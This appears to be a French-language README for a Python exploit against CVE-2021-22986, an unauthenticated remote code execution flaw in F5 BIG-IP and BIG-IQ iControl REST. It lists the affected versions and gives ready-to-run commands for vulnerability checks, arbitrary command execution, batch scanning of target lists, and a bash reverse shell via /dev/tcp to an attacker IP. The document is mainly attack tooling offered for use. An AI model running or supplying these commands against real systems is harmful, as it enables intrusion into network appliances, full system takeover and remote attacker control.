
Exploit Python pour CVE-2021-22986, permettant une RCE non authentifiée sur F5 BIG-IP et BIG-IQ via iControl REST, avec exécution de commandes, scan par lots et fonctionnalités de shell inversé.
Cette vulnérabilité permet à des attaquants non authentifiés ayant un accès réseau à l'interface iControl REST, via l'interface de gestion BIG-IP et les adresses IP self, d'exécuter des commandes système arbitraires, de créer ou supprimer des fichiers et de désactiver des services. Cette vulnérabilité ne peut être exploitée que via le plan de contrôle et non via le plan de données. L'exploitation peut conduire à un compromis total du système. Le système BIG-IP en mode Appliance est également vulnérable.
F5 BIG-IQ 6.0.0-6.1.0 F5 BIG-IQ 7.0.0-7.0.0.1 F5 BIG-IQ 7.1.0-7.1.0.2 F5 BIG-IP 12.1.0-12.1.5.2 F5 BIG-IP 13.1.0-13.1.3.5 F5 BIG-IP 14.1.0-14.1.3.1 F5 BIG-IP 15.1.0-15.1.2 F5 BIG-IP 16.0.0-16.0.1
python3 CVE_2021_22986.py
python3 CVE_2021_22986.py -v true -u https://192.168.174.164
python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c id
python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c whoami
python3 CVE_2021_22986.py -s true -f check.txt
python3 CVE_2021_22986.py -r true -u https://192.168.174.164 -c "bash -i >&/dev/tcp/192.168.174.129/8888 0>&1"
python3 newpoc.py https://192.168.174.164